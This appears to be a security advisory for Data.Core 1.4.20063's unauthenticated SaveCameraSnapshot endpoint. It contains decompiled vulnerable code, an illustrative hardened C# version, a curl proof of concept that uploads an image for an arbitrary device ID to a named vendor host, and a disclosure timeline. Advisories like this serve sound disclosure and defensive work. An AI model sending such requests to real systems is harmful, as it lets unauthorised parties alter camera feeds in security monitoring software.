Vulnerability Description:
Data.Core version 1.4.20063 does not authenticate the caller or check permissions in any way for the SaveCameraSnapshot functionality. This allows an unauthenticated attacker to upload camera previews for arbitrary device IDs.
Here is the code that handles the camera preview upload. Note the lack of authentication checks. I've removed some unnecessary details for clarity:
// Assembly: Data.Core, Version=1.4.20063.0, Culture=neutral, PublicKeyToken=null
// MVID: 056C382B-886F-4DB7-8A66-306BAE1C5391
// Assembly location: C:\Users\admin\Documents\Immix\program\API\Data.Core.dll
[HttpPost("SaveCameraSnapshot")]
public async Task SaveCameraSnapshot([FromForm] SnapshotInfo info)
{
    // The form fields are used as supplied: no caller identity or permission check happens here.
    byte[] data = Convert.FromBase64String(info.Image);
    using (IImmixDB db = this._provider.GetDB())
    {
        DeviceSetting deviceSetting = await Task.Run<DeviceSetting>((Func<DeviceSetting>) (<snip>));
        int settingNumber = 1;
        <snip>
        DeviceSetting settingRecord = await Task.Run<DeviceSetting>((Func<DeviceSetting>) (<snip>));
        <snip>
        DeviceSetting setting = new DeviceSetting() {<snip>};
        // The new setting record is written to the database for whichever device the request named.
        long num1 = await Task.Run<long>((Func<long>) (() => db.Insert<DeviceSetting>(setting)));
    }
    data = (byte[]) null;
}
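For contrast, a hardened form of the same endpoint, added here as an example: it is not the vendor's fix (which this page does not describe) and not code from Data.Core. `IDeviceAccess` and its two methods, the `SnapshotInfo` shape and the 2 MB size limit are assumptions, and the application is assumed to have an authentication scheme registered.

```csharp
using System;
using System.Security.Claims;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Mvc;

// Assumed form model: DeviceID and Image are the two fields the request sends.
public class SnapshotInfo
{
    public int DeviceID { get; set; }
    public string Image { get; set; }
}

// Hypothetical abstraction over the permission lookup and the database write.
public interface IDeviceAccess
{
    Task<bool> CanWriteSnapshotAsync(string userId, int deviceId);
    Task SaveSnapshotAsync(int deviceId, byte[] image);
}

[ApiController]
[Route("api/Devices")]
[Authorize] // anonymous callers get 401 before the action body runs
public class DevicesController : ControllerBase
{
    private const int MaxImageBytes = 2 * 1024 * 1024; // assumed cap for a preview image
    private readonly IDeviceAccess _access;
    public DevicesController(IDeviceAccess access) => _access = access;

    [HttpPost("SaveCameraSnapshot")]
    public async Task<IActionResult> SaveCameraSnapshot([FromForm] SnapshotInfo info)
    {
        // Identity comes from the validated credential, never from the form body.
        string userId = User.FindFirst(ClaimTypes.NameIdentifier)?.Value;
        if (userId == null) return Unauthorized();
        // Per-device check: being logged in is not enough to write to any DeviceID.
        if (!await _access.CanWriteSnapshotAsync(userId, info.DeviceID)) return Forbid();
        // Bound the input before decoding (base64 text is 4/3 the size of the data).
        if (string.IsNullOrEmpty(info.Image) || info.Image.Length > MaxImageBytes / 3 * 4)
            return BadRequest();
        byte[] data;
        try { data = Convert.FromBase64String(info.Image); }
        catch (FormatException) { return BadRequest(); }
        await _access.SaveSnapshotAsync(info.DeviceID, data);
        return Ok();
    }
}
```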
Exploit Proof-of-Concept:
curl -i 'https://mobiletest.sureviewsystems.com/api/Devices/SaveCameraSnapshot' --data-urlencode "DeviceID=6" --data-urlencode "Image=$(base64 cat.png)"
HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: Kestrel
Date: Sat, 27 Mar 2021 16:52:18 GMT
Content-Length: 0
Timeline
Disclosed: March 29, 2021
Acknowledged: March 29, 2021
Fixed: May 18, 2021